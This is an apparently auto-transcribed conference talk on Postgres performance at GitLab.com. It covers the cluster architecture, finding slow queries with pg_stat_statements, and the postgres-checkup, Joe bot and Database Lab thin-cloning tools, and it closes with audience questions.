you Hello everyone, welcome to the talk about database performance at GitLab.com. I will present this talk with Nikolai. So let's go for the introductions. My name is Josec Correcinoto. I work in GitLab with the infrastructure team. I'm part of the team since September of 2018. And my background is in large organizations working with infrastructure, specialized in databases, performance, HA, etc. Nik, could you please present yourself? All right, thank you, Josec. My name is Nik, and I work with databases all my professional life. And I have a database related education. And I started with, many years ago, I started with commercial databases, but fortunately quickly switched to open source database system, Postgres, and no regrets since then. I also was briefly a hacker, and I participated in development of XML data type and functions. Also, I have a lot of various community activities, including Russian-speaking Postgres user group. And recently we launched Postgres TV in English. It's a YouTube B-weekly show. And also I participated in various conferences as a program committee member. A few years ago, I migrated to the US and relaunched my consulting practice, helping companies scale Postgres and improve performance. Thanks, Kola. I would like to introduce now the agenda for talk today. We'll talk a bit about GitLab, the company members and values from the company, architecture that we have there, and challenges that you are facing, some perform analysis that we're executing constantly lately, and some tools that are helping us in our day-to-day development by Postgres AI. Postgres Checkup, Jobbot, and Database Lab. Okay. First of all, what is GitLab? GitLab is a complete lifecycle tool for the DevOps that helps us to develop better softwares. So, GitLab has some special values from the company that I think is one of the main reasons that I joined them is, like, what are the values of the company? Starting for collaboration, we work asynchronous and remotely. We do not have offices all around the globe, but we keep cooperating with our colleagues using our tools and our methodology. Basically, iterating for, by issues or change requests or metric requests. Second, the results. In GitLab, we don't track hours, we track outcomes. Efficiency. We look always true for solutions that are straightforward. We don't want to reinvent the wheel or we're not looking for the most sophisticated solution. We want simple solutions. Diversity. We are based in 67 countries. So, we have people from different countries with different ideas that always supports for us different solutions, adding value to the trust. Iteration. In GitLab, we always like to work with the minimum viable changes. We don't want to create a big project and then try to integrate it. We prefer to do integration step by step. And the last value is transparency. Our company is 100% transparent. We have all our issues public and our roadmap, our strategy. And even when we have an outage, we have an instant issue. We have an issue that represents the incidents and we explain everything that happened. What are the measurements to fix? What are the plans for the future as a collective action to do this don't happen again? I think it's really interesting. So, now, I will talk a bit about the open source project. We have two versions of GitLab. One is the enterprise edition and the other is a community edition. In this case, here is the community edition. 
That is the open source project that is used by more than 100,000 organizations, and we have more than 3,000 code contributors. An interesting fact is that we release every month, on the 22nd, with new features. Talking a bit about the enterprise edition and about how the company works: we support the complete development lifecycle, we are more than 1,297 employees located in 67 countries, and we have more than 30 million registered users. Within that, some users are on GitLab.com, the part that we work on, and the others are users running the self-managed version, which can be the enterprise edition or the community edition. Something interesting about GitLab is that the project started in 2011, and in 2015 it was getting awards as one of the fastest growing companies. Then we have the handbook, which is worth mentioning: it is our guideline for how we work. In the handbook we have how the teams work, what our goals are, the methodology, roadmaps, and so on. It's pretty flexible inside GitLab, and all of us can participate in it. The mission of GitLab is that everyone can contribute: inside our teams and organizations we can always open an MR to give a suggestion about how things are being done or something that we think could be improved; then we have a chat or a discussion and try to get the best outcome of it. That's what I wanted to say about the company; now I would like to talk about the features. As you can see, we cover a lot of the full DevOps concept itself, and we use the tool a lot internally — we have the principle of dogfooding. For example, we constantly use CI/CD pipelines: our backups are restored and tested by CI/CD pipelines every day, which is a good example. Then we have newer features I would like to mention, such as monitoring. We have runbooks as well: we can link an alert to the runbook that describes the process the SREs should follow when the alert triggers, and so on. Besides that, we have all the security parts in the Protect area that you see here. If we look at the metrics of feature development, we see that every year we are developing more features — in the last years we have been growing and producing more and more features every year. Now let's talk about what GitLab.com is. We manage this hosted version; it's software as a service. You can see that we have over 40 million Git pull operations and more than 6,000 Git requests per second. We have a lovely database there — that's what we take care of. It is PostgreSQL version 11.6, a cluster of eight nodes: one primary and seven secondaries. The primary handles around 60 to 80 thousand transactions per second at peak times, and the read-only nodes around 20 to 30 thousand in general. The hardware architecture we have is n1 machines with 96 cores and 624 gigabytes of memory. We use PgBouncer and we use Patroni — I'll explain this in the architecture diagrams that follow. Basically, what do we have here? We have Postgres. In front of Postgres, in the case of the read-only nodes, we have PgBouncer, and as you can see, for the read-write node we have two clusters of PgBouncer: one for the synchronous traffic and one for the asynchronous traffic. The pools are configured differently for better, optimized performance. Let me explain this a bit more.
The synchronous traffic is the traffic that comes from the Web and the API; everything else, the asynchronous traffic, comes from Sidekiq, the background jobs in general. On the other side, to redirect the traffic we are using Consul DNS names. We have two Consul names for the read-write traffic, as you can see here — one for synchronous and one for asynchronous — and a different endpoint for the read-only traffic. The read-only traffic is redirected to all the nodes that are in a read-only state, the secondaries. Patroni, which we are using here, is what controls who is the primary, and in case of an incident or a problem it will do the failover, or it will remove from the cluster any of the read-only nodes that are not operating properly. Patroni is a high-availability template for Postgres that, in our case, uses Consul as the DCS, the distributed consensus store, where we keep the information about the status of the cluster the whole time. And here is the diagram of this. Okay. Now we will talk about one problem that we have faced at times: when we have a big degradation in performance, or we start to see something suspicious. For example, here — this is from the primary — at some moments of the day we get spikes of CPU utilization that reach over 85%. We want to investigate this, understand what is happening there, and see what the root causes are. We know that we have constant deliveries and new releases, and the scenario is always changing. Since we have so many customers in one database — we are a monolith — we need to understand the functionality of every one of the components perfectly in order to optimize it and keep expanding our capacity to resolve all the queries and statements that we are receiving at the moment. What we do here is check the time of the spike that we found. Great. Now I need to explain a couple of things more. In GitLab we use a Postgres extension, pg_stat_statements, that basically collects data on the 5,000 most executed statements in the database. Besides this, we send this data via the Postgres exporter to Prometheus, where it is additionally aggregated in Thanos, and then we do the analysis in Thanos directly, or in Prometheus, as follows. We check the following two concepts in pg_stat_statements. First, here, I'm checking the total time that queries take to be resolved, so we list the 10 statements that take the most time to resolve. Here is the query, and here is the link to Thanos to see the query itself, which I will share on the next screen. As you can see, during that spike in production, some statements were taking more time to resolve, and you can see that before and after, the load was different — more standard, smoother. So we need to understand what's going on, or why we have these calls here. Great. What do we do next? We check the next screen, or the next option here in the console, to see what the queries are. So this, as you can see, is what demanded the most time during this peak, and here I have the queries.
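As a rough illustration of what sits behind these dashboards, a direct pg_stat_statements query for the two views described (top total time here, and top call counts a little further on) might look like this. Column names follow PostgreSQL 11 (total_time, mean_time); this is not GitLab's actual Prometheus/Thanos query.

```sql
-- Top 10 query groups by total time spent.
SELECT queryid,
       calls,
       round(total_time::numeric, 1) AS total_ms,
       round(mean_time::numeric, 3)  AS mean_ms,
       left(query, 80)               AS query_sample
FROM pg_stat_statements
ORDER BY total_time DESC
LIMIT 10;

-- Top 10 query groups by number of calls (the "heavy hitters").
SELECT queryid,
       calls,
       round(mean_time::numeric, 3)  AS mean_ms,
       left(query, 80)               AS query_sample
FROM pg_stat_statements
ORDER BY calls DESC
LIMIT 10;
```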
Having the queries, what I will do is go back to pg_stat_statements and check which queries they are. Here we list all the statements that are being executed, and then we have a great basis for talking with our developers about what we can improve. One really interesting thing that we use in GitLab: as you can see, at the end of the SQL statements we have a comment. Since most of our application is developed in Ruby on Rails, we have a gem called Marginalia that adds a comment saying which method triggered that query, and that is how we can trace back the root cause of the statement. This is really useful for the iteration principle, and also for the next analysis that we'll talk about in a few minutes, the one based on the maximum number of calls. So, having this information, we talk with our developers to see if the plan can be improved, or whether we can reduce the frequency of the calls that we are making. With this, we start to create issues for each one of the queries and work with the teams looking for improvements, trying to use the database resources more wisely. Great. The second method we use to evaluate queries in the database is the queries that are called the most — the first view was the queries that took the most time to resolve, and now it's the queries that we call the most times per second or per minute. So we are evaluating who the heavy hitters on the database are. Sometimes we have queries that are really fast, but in a degradation scenario they start to behave as slowly as the rest. As you will see, some statements can be executed two or three thousand times per second while being something like a SELECT from a table filtered by the primary key — we just look up by the primary key, so the scope for optimization is pretty small, or not possible at all. What we do in that case is add some caching: having caching structures outside of the database can improve performance a lot. Of course, we have to have a mechanism to update or refresh the cache in case of updates, but still, we have seen big improvements from that. So here is the query and the corresponding view; in the graph, as you can see, there is a little deviation here in the number of queries per second, and here you see the statements. The case I mentioned a few minutes ago is case number three and two: as you can see, we are checking one table and just doing a lookup by primary key, and these are good candidates for either reducing the frequency or caching them. That's another workaround we are doing to improve the performance of the database. So now I would like to hand over to Nikolai to talk about the daily tools by Postgres.ai that we use: postgres-checkup, the Joe bot, and Database Lab. Thank you, Jose. I'm about to share my screen. Okay. Do you see it? Yes. Cool. Okay, let me present here. So let's talk briefly about postgres-checkup, an open source tool for automated health checks of Postgres databases. The idea was this: in some cases we don't have monitoring for Postgres, especially for queries, at all. In some cases we have query monitoring, but it lacks old data and we cannot understand what happened one year ago, or it has only a few metrics available for analysis and you don't have a detailed view of the most important query groups. And additionally, there are many things that a DBA usually does by hand.
And as I mentioned, I relaunched my consulting practice in California a few years ago. Before that I was CTO and CEO of various startups in Russia, and I previously had a consulting practice in Russia as well. When I relaunched it, I found myself in a position where a lot of this work was still very manual. For a health check you need some kind of kit — there are many interesting queries on GitHub and GitLab, and you can find collections of useful snippets — but the problem is that it's very boring. Usually, when you meet a database for the first time, you are interested and you perform a very good health check; when you meet it a second time six months later, you still perform it very well; but then you get bored, you skip many checks, and that is not what we need. So what do we want? We want to collect data continuously. That's why my team and I created the postgres-checkup tool. The intention was to automate the most boring things: run many checks in an automated fashion, collect data, analyze the primary and all replicas in a centralized way, and provide good conclusions and recommendations for teams. We have already created almost 30 reports, and most of them have not only observations but also conclusions and recommendations. The checks are very lightweight, and one of the key ideas was that we should not install anything on production: we do the same things a regular DBA does, so it can be used on the very first day — a zero-install approach. It's also very light and unobtrusive; it limits itself using statement_timeout. And it performs multi-node analysis: as I mentioned, information from all nodes is aggregated into a single collection of reports. We cover various things: bloat control, index health control, deep query analysis with various metrics. We also track versions and settings and find differences between the primary and the replicas. We can answer questions like what settings we had two months ago — it's a kind of strategic tool. It's not intended to react quickly to problems; it's more for capacity planning, for understanding your workload better and seeing how the health of the database looks over time. It's for strategic control of database health over time. A few examples of reports. Here is, for GitLab, an example of the unused indexes report. It's not that bad: we have 160 gigabytes — you can see it here — of disk space that I would say is wasted, because nobody is using these indexes. Of course, GitLab is specific, because GitLab.com is only one of more than 100,000 installations of the GitLab software, so sometimes there is the question of whether some indexes are needed for other installations — it's a little bit tricky. For a nine terabyte database it's a small fraction of disk space wasted, but of course all unused indexes affect the performance of modifying queries, so you always want to get rid of them sooner. The information here specifically shows all zeros, to convince everyone that the index is not used on the primary or on any replica. I have seen mistakes where people analyzed only the primary and dropped an index, but it was used on some replica. And of course — sorry for the small font — here we have six months of analysis, so the statistics age is six months and we can definitely draw conclusions.
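A simplified query of the kind such an unused-index report is built on is shown below; it is not the actual postgres-checkup code, and as Nikolai stresses it only means anything when run on the primary and on every replica, over a long enough statistics window.

```sql
-- Indexes with zero scans on this node; run on the primary AND all replicas.
SELECT s.schemaname,
       s.relname        AS table_name,
       s.indexrelname   AS index_name,
       pg_size_pretty(pg_relation_size(s.indexrelid)) AS index_size,
       s.idx_scan
FROM pg_stat_user_indexes AS s
JOIN pg_index AS i ON i.indexrelid = s.indexrelid
WHERE s.idx_scan = 0
  AND NOT i.indisunique            -- unique indexes enforce constraints
ORDER BY pg_relation_size(s.indexrelid) DESC;
```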
If you see a statistics age of only one day, by contrast, you will see a warning here: it's not enough to draw conclusions yet. And here is the report based on two snapshots of pg_stat_statements. It can be extended with pg_stat_kcache to see CPU and real disk IO, but basically the idea is that we take all the metrics from pg_stat_statements and do additional processing, like dividing by the number of seconds between the two points in time, and we start finding interesting insights. For example, you can see the heaviest query group in terms of total time, this one. We see that the primary, which as Jose mentioned has 96 cores, could service this query group using just one core, because it spends less than one second per second on it — and that's not pure CPU time, of course; locking and IO are included. So it is quite well optimized, and the influence of this query group is only 15%. In bad cases we see 40, 60, sometimes 70 percent, and some query group is so huge that we start ringing the bell: we need to optimize it very soon. So if you combine this with your monitoring, you start to understand your workload much, much better. We also provide a higher-level report where we aggregate not by normalized queries but only by the first word of each. For a case like GitLab, which runs on Ruby on Rails and its ORM, almost no SQL or PL/pgSQL functions are used, so we can aggregate by first word and understand that SELECTs are almost 94% by frequency but much less by total time, and UPDATEs are only 2% by frequency — updates of course take more time than selects, usually. You can also see averages here. So you start to feel your workload much better. And at the highest level, we provide a single set of metrics aggregating all queries from pg_stat_statements. The pg_stat_statements.max parameter is set to 5000, so it's reasonably representative, especially if the distance between the two points is not huge — we use something like 30 minutes during the busiest hours. So this is how you can start understanding your workload based on this tabular data. Not all people love tables, but not all people love graphs either, so it's good to have both. That's it — as I've said, postgres-checkup is a boring tool; it was created to make the health-check work of a DBA or DBRE less boring. So let's switch to a more exciting topic: how to conduct experiments on databases, and how to make those experiments much, much better already today. My original intention with the Postgres.ai company was to automate what is not yet automated around databases, specifically what is related to performance optimization and scalability — not touching sharding and provisioning and similar topics, which are already solved by other companies. Here you can see the logos of some of our customers and partners; of course, GitLab is very significant in this list. And the idea was this: I started to notice that when we need to develop or test something, we usually deal with empty or small synthetic databases, or some reduced data sets, in development — and that "dev" part of DevOps becomes weaker.
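Before moving on, a plain-SQL sketch of the two-snapshot idea the checkup reports above are built on; postgres-checkup itself does far more (multi-node collection, conclusions, recommendations), so this only illustrates the principle, again with PostgreSQL 11 column names.

```sql
-- Take a snapshot of the counters (repeat ~30 minutes later for a second one).
CREATE TABLE IF NOT EXISTS pgss_snapshot AS
    SELECT now() AS captured_at, queryid, query, calls, total_time
    FROM pg_stat_statements
    WITH NO DATA;

INSERT INTO pgss_snapshot
SELECT now(), queryid, query, calls, total_time FROM pg_stat_statements;

-- Diff the two snapshots and normalize per second of elapsed time.
-- ms_per_sec close to 1000 means roughly one core's worth of query time.
WITH s AS (
    SELECT captured_at, queryid, query, calls, total_time,
           row_number() OVER (PARTITION BY queryid ORDER BY captured_at) AS rn
    FROM pgss_snapshot
)
SELECT s2.query,
       (s2.calls - s1.calls)
           / extract(epoch FROM (s2.captured_at - s1.captured_at)) AS calls_per_sec,
       (s2.total_time - s1.total_time)
           / extract(epoch FROM (s2.captured_at - s1.captured_at)) AS ms_per_sec
FROM s AS s1
JOIN s AS s2 USING (queryid)
WHERE s1.rn = 1 AND s2.rn = 2
ORDER BY ms_per_sec DESC
LIMIT 10;
```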
Only a few people can usually create a clone of the real production database and verify ideas there, and it's not good if you cannot verify ideas. So the intention was: we should fix this picture, balance dev and ops, and give powerful tools to those who develop and test something before it goes to production, is deployed, and goes under operation. That's why we created Database Lab. Before we talk about it, let's consider what came before. If we want to check something — for example, the plan of some query — we usually do it right on production to get good results, because if you deal with different data, you deal with different statistics (Postgres internally has different statistics of the data), so the plans can be very different and your EXPLAIN will be meaningless. If you want good results, you need to go to production. GitLab also had a tool to automate running EXPLAIN right on one of the production replicas. But what does that mean? It means you cannot run queries longer than 15 seconds — that's the GitLab statement_timeout. Of course, some people can change it if they can issue a SET command, but it's not encouraged: if you have a query running 30 minutes, maybe it's not a good idea to run it on a replica, because hot_standby_feedback is on, so autovacuum on the primary will know that you still need this data, and it will wait and not remove the dead tuples. So health can degrade if you run long queries there often. And of course you cannot run updates, inserts and so on on a replica, and you cannot verify index ideas or change the schema — you are very limited. That's why you probably need a full-size thick clone, that is, a regular copy. You can create a replica and promote it, or you can provision a clone from physical backups. GitLab.com uses WAL-G, with the data stored in GCS, so you can provision a new lab instance for your needs using that data, and production nodes will not be affected at all — no risks here. Good. But you need to wait. And if you have several people who need it, you need several instances, or you will have conflicts — I specifically put two people here working with one single database to highlight how problems can arise. So you want to spend less money and less time. With the almost 10 terabytes GitLab.com has right now, one terabyte usually takes roughly one hour — that's a good speed — to copy over the network from backups. You can speed it up, and the new WAL-G is very good: previously GitLab.com had WAL-E, it was replaced by WAL-G, and right now it's between 30 and 60 minutes per terabyte. But it means that for a database of this size — nine terabytes, as I mentioned, and it will be ten very soon — you need to spend five hours or so to provision a full-size copy. It's not fun to wait so many hours. And when you check something, if you cannot revert your changes — or if you revert the changes logically but the physical layout has changed — it's no good in terms of experimenting; it's really hard to repeat the same thing multiple times, but during development and testing we do need to repeat everything. So that's why, in most companies, what we observe is that people just tend to skip very important checks. They don't check their queries; they try to guess what will happen on production.
And this leads to mistakes and missed problems. So how can we do better? We can take just one machine with one disk or disk array, and we copy the data in the regular, thick fashion one time. Then we maintain its state like a replica — a small one, meaning shared buffers are small — but we keep it running, replaying WALs from the archive, so its state is constantly updated. And when someone needs to experiment, we provide a thin clone. What does thin mean? At a high level it means that you have one machine with one disk of 10 terabytes, you put a 10 terabyte database there — it's compressed, by the way. Thin cloning can be achieved with various tools; Database Lab Engine supports both ZFS and LVM, but ZFS is much more powerful for our needs, so we will talk about ZFS. ZFS can give you, in a few seconds, a fully independent copy of the 10 terabyte database, and you can change it and other people will not see your changes — they can work on the same machine with different copies of the same database. How does it work? I'm sure most of you already know the terms thin cloning and thin provisioning and the copy-on-write idea; it's used in many areas of computer science — memory, file systems, many places. If you don't, I strongly encourage you to read some articles about it; there are many, including Wikipedia. But roughly, here we talk about the data block level, not the file level. Data blocks are shared among all users: common data is shared, and when someone changes something or adds new data — creates and fills a table, creates an index, or issues some update — the additional delta is stored separately, and ZFS tracks everything transparently. So what we have is one 10 terabyte disk and, say, 20 people working with 20 clones at the same time, and it works very well. It feels like magic: you can get your database, or a couple of databases, in a few seconds, do something, and get rid of them — it feels like disposable databases, actually. Now, there are good areas where you can apply this and bad ones. A good area, as I've mentioned, is SQL optimization: you can run EXPLAIN, you can run EXPLAIN ANALYZE. You need to keep in mind that the timing will be different, because it's a different file system and usually a weaker machine than production — we don't want to spend 100 CPU cores on 20 people, that's too much, and memory is also smaller — and the cache state is different, so timing can differ. But I should mention that if you run something on production today, it can be different tomorrow because of different concurrent workload, so that is also true there. That's why I always encourage paying attention to the structure of the EXPLAIN plan and to the buffer numbers: if you run EXPLAIN (ANALYZE, BUFFERS), you get buffer numbers and you see how much data is processed. And since we tune the clones — we set planner settings such as work_mem and, most importantly, effective_cache_size to the same values as on production — the plans match. We don't have that many gigabytes of memory, but we set effective_cache_size above our actual limit, and that's okay, because that is what the Postgres planner needs in order to provide plans identical to production.
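To make the "compare plan shape and buffers, not timing" advice concrete, a check on a thin clone might look like the sketch below; the table and filter are invented for the example.

```sql
-- Planner-related settings on the clone mirror production (for example
-- work_mem, effective_cache_size, random_page_cost); shared_buffers stays
-- small because many clones share one machine.
EXPLAIN (ANALYZE, BUFFERS)
SELECT *
FROM issues
WHERE project_id = 12345
ORDER BY created_at DESC
LIMIT 20;
-- Compare the plan shape (index vs. sequential scan, join order) and the
-- "Buffers: shared hit/read" numbers with production; wall-clock timing on
-- the clone is expected to differ and is not the signal to optimize for.
```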
And shared buffers are much smaller — but the interesting fact is that the planner does not use shared buffers, and that's why we can run multiple Postgres instances on the same machine. We can check DDL, we can check index ideas, we can automatically check database migrations — which is a very hard topic right now — and much more. We can also offload some analytical queries to such a machine and not disturb autovacuum on the primary, not cause delays, and not disturb others. As for what we should not do with this thin-clone approach: we should not do load testing, because the file system is different and behavior will be different. Also, if your intention is to run some heavy load and involve multiple CPU cores, it means you should be alone on the machine, so it should not be shared — and the Database Lab Engine is supposed to be shared. I also see some people treating the Database Lab Engine like a regular clone, and of course that's not entirely a good idea, because you cannot fail over to such a machine. But some pieces make sense — for example, recovering accidentally deleted data: you can recover data much faster using the Database Lab Engine than by performing point-in-time recovery with WAL-G or pgBackRest or something like that. So there are interesting applications around it, but of course no load testing. We have an open core model, so the Database Lab Engine is very similar to GitLab in that sense: the engine is open source, you can take it and participate in development, and we have external committers. The engine provides an API and a CLI out of the box; if you want a graphical interface, please try our SaaS solution at Postgres.ai, where you will also see additional features such as fine-grained access control, visualization, history — a centralized store of knowledge about your database performance. And this is how it originally looked in GitLab. GitLab was an early user of our tools, and it started with the Joe bot. Originally it worked only in Slack; right now it provides both a Slack interface and a web UI on Postgres.ai to more than 160 developers who have questions like "what will the plan for this query be on production?". Most of them don't have access to production data, but they have such questions. Previously they needed to ask database experts, and as Jose mentioned, GitLab is distributed, so sometimes you needed to wait several days to get an answer. That's not good — asynchronous remote work is all about being unblocked and not blocking others, so it's better to have a direct tool to get answers. And my intention was: I don't want to answer simple questions all the time, I want to deal with hard problems. So I offloaded this work to the chatbot. The chatbot can answer the question and provide the plan as it would be on production, and you can also ask it: what if I had this index? Okay, it will create the index and repeat the EXPLAIN. That's how it works — using a thin clone, you will see the plan without directly accessing the database. That was one application of Database Lab and the Joe bot, and it's already very successful. But another one is also interesting, and there is a lot of work in progress right now, in both companies — in GitLab and in our Postgres.ai company. The problem was this: okay, we have a powerful tool, and we can manually check various queries and DDL.
But sometimes like since it's manual, sometimes we like it's hard to check everything all the time. And you change something, you need to repeat your check. It's like there is some manual part in this work still. And sometimes this like example here, this happens. So some deployment and some queries hit statement amount. It's very aggressive in GitLab.com 15 seconds. If you start hitting it, it's no fun. So the idea is you can put work with CI with database lab, think loans in CI, GitLab CI in this case, and use CLI to get think loans. And then it should be like how it works in GitLab, it's implemented as a separate project. And only a few people have access to it because it's production data. It's kind of production project actually. So it's under like in terms of security and operations, it's kind of part of production. But it serves the needs to check what will be with deployment, right? So and the original author of database migration sees only the summary. Summary is very primitive right now, only timing, but it's planned to provide much more details and metrics and analysis of how migrations DDL will behave. And also in PostgreSQL, we created concept of CI observer. It collects various stuff, including it can highlight if you have dangerous long lasting lock. For example, you do create index on the large table, but for God, the work can currently, it's a trivial example. It will be, it will block even selects for a long time. And CI observer with data running on database lab, it helps you to get these cases and mark this CI built as failed, not to deploy this. So you go and add work concurrently on only then you can deploy it. Okay, quick demo. I very briefly, since we are running out of time, very briefly show you how easy is to create a clone. This is a GitLab project on PostgreSQL. So you can create clone of real production database in seconds. You can choose, you can take, you can time travel every, every six hours, new snapshot is created. Let's create version of database for tomorrow. So we database size is nine terabytes. And let's see how it is to create it. Here I use graphical interface API and CLI also available. Here it is. So we have new clone and it took only four seconds. Okay, we see that other people are also working there is a job bot which like it's upper level without direct access to data, you can talk to it and for example, do something I already started session here. And we implemented various additional capabilities here, for example, hypothetical indexes and you can see activity of what is running right now. You can run DDL with exact command, explain analyze buffers with explain command. So we for example, can explain from projects and see like this number is expected it's running. So it runs two times first time without execution and already running second time with execution. So it should take like data should be cashed right now. So it should take right something like 10 seconds or so. Let's see, maybe more. Let's let's see another feature while it's running. So all the directions we've just had bought is stored in history. So you can see your teammates also working here. And, and you can return to previous optimization sessions. I have some example here, which, which allow us to see some interesting. Okay, I have some example here, which allow us to see additional features where we embedded path to visualization from Dalibor, you can see explain plans, plans visualized or explain depth ish very popular tool. 
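The textbook case the CI observer is meant to catch is exactly that one — an index built without CONCURRENTLY on a large table. A hedged sketch (table and index names invented):

```sql
-- Blocking variant: holds a lock that blocks writes on the table for the
-- whole build, and can cause lock queues behind it -- this is the kind of
-- migration the CI check should flag and fail.
CREATE INDEX idx_events_user_id ON events (user_id);

-- Variant to deploy instead: builds without blocking normal writes,
-- at the cost of a longer total build time.
CREATE INDEX CONCURRENTLY idx_events_user_id ON events (user_id);
```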
And you can even you can share it if you want to this information to be public publicly available, you can share it, including visualization, but by default, it's not available to others. I mean, it's available only for your teammates. And that's it. Okay, let's check. Okay, actual plan already done. So we see this number of projects and GitLab. So we also can go ahead and drop. So we can go ahead and drop. So we can go ahead and drop projects and GitLab. So we also can go ahead and drop, drop this table right now cascade because many tables depend on it. So right now we are dropping. We are dropping the table, the central table in GitLab and its production database, but not real database, it's a copy, not like we, we asked for yesterday copy, right? We dropped this table, it should take several seconds. And then we can, if we, if we repeat this, explain, we will see that this table does not exist anymore, right? Error here, but we can reset and it again, it takes a few seconds to reset to the initial state and start working with exactly the same snapshot, exactly same statistics, physical layout, blow out everything like on production, corresponding to that point in time. Okay. And we, we have this table again back. So this is how you can iterate in development using manual chatbot tool or you can automate it using CLI in your CI, for example. That's actually it with demo, some summary, health check is automated in GitLab using PostgreSQL checkup tool and more than 150 engineers now have access to tool which without anyone else allow them to get answers to questions like what will be the plan on production for this query? And I, like, also they can verify any DDL including like create index or change scheme of the table and check queries again. This is, this is called optimization process. So they can do it unblocked, not asking her, when they ask her, they already collected some initial data and everything speeds up significantly. They also, I've noticed that people who didn't have access to production, actually most of developers, most of backend developers, they now have access to experimenting with real, real data, not seeing this data by the way. And so, so they can understand how PostgreSQL behaves for various queries. So they actually make, make, can make mistakes and learn because when we learn, we need to make, be able to make mistakes. And this is very good. They don't block others doing so. And database team has much, much more details about behavior of particular database migration or particular query. And they, their work is simplified and improved as well. So control over performances of databases is improved. And the downtime and performance regression risks are decreased because a lot of automation involved. That's actually it. That's actually it with my part. Jose? So we are done? Yes, we're done. Okay. Good. Thank you for watching. It's time for questions and answers. Good. Good. Like just like a minute or so. Okay. So we are like, we're redirected to the mainstream. Okay. Okay, we are live now. So thank you guys for the great talk. That was really interesting. And I see some questions, but most of them were already answered by you. Maybe the question about PgStat statesman versus PgBudger from myself, like if you could answer this one. Actually, we like to analyze the PgStat statement. Since we don't log, we log just the queries that are over one second of the threshold and are in the logs. 
So you will see having a spike of performance, you will see just the statements that are the slowest ones. And you lose, we wouldn't see what are the queries that are being processed in this threshold behind. And having analysis in PgStat statements, principally as we do that, sending this information through from a TUS Thanos, we can analyze even this small queries like most of them, I don't know what these statements are. This, like I will try to add only a few words because it's a very, very broad topic. Generally, we have three sources of information for what I call macro analysis when we try to analyze the whole SQL workload. First is logs. And historically, this appeared much before PgStat statements created. We had PgFuin, then PgBudger, first in PHP, then Perl. And then PgStat statements, aggregated statistics. And there are alternatives to PgStat statements. I can recommend the other talk from HOSDEM, from Perkona, about PgStat monitor. This is very interesting, new development. And finally, we have PgStat activity and we can sample from it. And sometimes we need to do it. For example, to answer questions, do we have elevated timing for some query because of locking issues? You can do it with analyzing logs partially, but you can have much better picture if you analyze weight events in PgStat activity. So there are three sources. And if you can combine all of them and use different tools, you have the most power. Because for particular cases, one tool is not enough. Okay. Understood. Yeah. Still, slow lock is an essential tool. Sometimes we, for example, PgStat statements doesn't register unfinished queries. And we can see them in the lock, we're canceled by statement timeout. Yeah. So there is another question from Magnus. So have you done any work or thoughts around integrating this snapshot tool with some form of data anonymization? Clearly, you can run a full anonymization process. Can't he clone itself or call goes away completely, but maybe, but maybe ask an intermediate step? Yeah, this is a very good question. And we have such questions constantly. And we have some work already done. Right. So if you first question here, we need to understand for in particular case, is it, is it okay at all to store any personal data where database lab engine is located? Because if you want to analyze, but you put the server to non production, but you still, if you're an animi as like only when preparing snapshots, it's possible by, by database lab engine. And actually we have integration, like some integration with posgas and animizer from Dalibo. So it's possible to use posgas and emizer together with database lab engine. In this case, you continue, for example, physically consume walls and replay changes from the source from archive or from directly from one production node. And when you, when database lab engine automatically prepares snapshots, say every hour or every four hours, you can inject any transformation. For example, posgas and animizer transformation. But in this case, physically some personal data still is stored. And maybe it's breaking some rules in the company. And you need to check it. So in some cases, if you want, if you want, if you cannot do it, you need first sanitize data to get rid of personal data, and then bring data to database lab engine. In this case, of course, you need to choose a logical way like dump restore with personalization. So that database lab engine supports both approaches. And like in the best case, you want two database lab engines. 
One should be closer to production without any anonymization and streaming, not streaming consuming walls, replaying wall walls from the archive. And the snapshots will be raw and only limited people, limited number of people will have access to it. And another database lab engine is with without personal data located to your non production environment. And this, but having the same number of rows, just without personal data. So it's very interesting and very, very difficult hard topic. And I think we will continue looking at this direction anyway. Okay, cool. And let me ask again the question that that was in the chat, because the chat will not be available later on. So the question about marginalia, could you explain what marginalia is actually, because probably most people would not be aware of that. And the exact question was some more. Yeah, does anyone know if there is a library similar to marginalia for node JS apps or go long apps? Yeah, also, you don't want to answer this or what I can answer as well. Okay, I'll answer. So marginalia is Ruby Jam extension to that allows you to answer questions. Okay, I see some query. It's not good in terms of performance. How can I find the lines of code where it originated from? There are different approaches to answer such questions. For example, you can try to use some tracing and some systems like application performance monitoring, which allow you to see call stacks associated with some query. But in this case, we have some caches we can find in which Ruby classes this query was originated. And there is, as I explained already in chat, there is a problem, like it's very useful, it's very good. But you need to think about a couple of problems here. Pergest start activity, query and pergest activity by default is limited to 1024 characters. You can increase it, but restart will be needed. So it's better to increase it earlier to a few thousand characters. Because sometimes we write developers write very long queries and this comment is used in the end. So if you're targeted, you don't see the comment. And this is about pergested activity, which provides a view on current queries as for pergested statements, which aggregates normalizes queries. So groups them into some query groups. It's interesting behavior. Like it has interesting behavior with respect to comments. It will take the first occurrence of the comment and we'll keep it for a group showing it like this is a comment raw without any not removing anything from the comment. But every subsequent comment for the same query group will be just ignored. So metrics will be incremented. And you will see just the first occurrence of comment. And you can trace only the first occurrence of query in this group. And this is not convenient. So you need to reset to see another one. And again, you reset, you see the first one after you set normal, not more. So that's why we probably need to look at pergested activity. Or again, of course, if the query is registered in the log logs, if it's slow enough to be above log mean duration statement, you will see the full text of the query, including this comment, and you can trace the origin of this query. As for non Ruby, I don't know. Sorry, like not JS, I don't know. Okay, sure. We've got one more question from Simon. How do you handle schema changes in depth when the developer wants to find the query plan against the prod like data for a query that uses the updated schema? Is that possible with the thin clone? 
Yes, of course, thin clone is read write provides read write access, you can change schema. If I mentioned example, you can create index, of course, you can add a column, you can do some complex change, and then check performance against the new schema. This is the magic with thin clones. It takes a few seconds. You have your own 10 terabyte database, you can change it anyhow. Nobody noticed, like, because every developer has a separate thin clone database. So, and like, the the idea is how to how to connect this to Git, for example, to associate with branches, we have actually something already developed, we can associate a particular clone with particular branch. And like now we think how to maintain long lived clones also, because sometimes you develop branches for months. And you want to maybe to keep this clone for longer, usually we keep it for not more than a few days, because if you have constantly updated state, and keep some old clone, it occupies data, because like, you have mainstream like this mainstream of data. And if you keep old clone, you keep like, you keep many data blocks, which only you need. And so it started to occupy too much space, because mainstream already run away to the future, but you still in the past. So, we are thinking how to improve this situation. It's like very interesting topic. So like, also in terms of cli, people want to work with database, like fork them like, get, get, like, like coding Git. So, I think we will develop improve something in this area as well. Everyone is welcome to go to our Git, repository on GitLab and open an issue and start discussion. I would very appreciate this. And it will be interesting to, to find some ideas and improve. Okay, thank you guys. Those were like all the questions and we are like, in time actually. So, that was the closing talk on our Postgres Devrooms. So hope like all of you will join us also tomorrow. 